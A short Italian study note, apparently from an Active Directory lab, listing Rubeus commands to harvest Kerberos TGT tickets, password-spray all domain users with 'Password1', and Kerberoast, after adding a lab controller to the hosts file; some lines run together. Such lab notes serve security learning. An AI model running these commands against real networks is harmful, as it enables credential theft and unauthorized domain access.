tags: Rebeus Windows_Privilage_Escalation active_directory
Rebeus ti permette di trovare i ticket TGT nella rete tramite questo comando:
Rubeus.exe harvest /interval:30Questo prenderà una password data e farà uno spray attack contro tutti gli utenti trovati, quindi fornirà il TGT .kirbi per quell’utente:
#Prima copia il domain nel file hosts:
echo 10.10.212.113 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts
Rubeus.exe brute /password:Password1 /noticketKerberoasting
Rubeus.exe kerberoast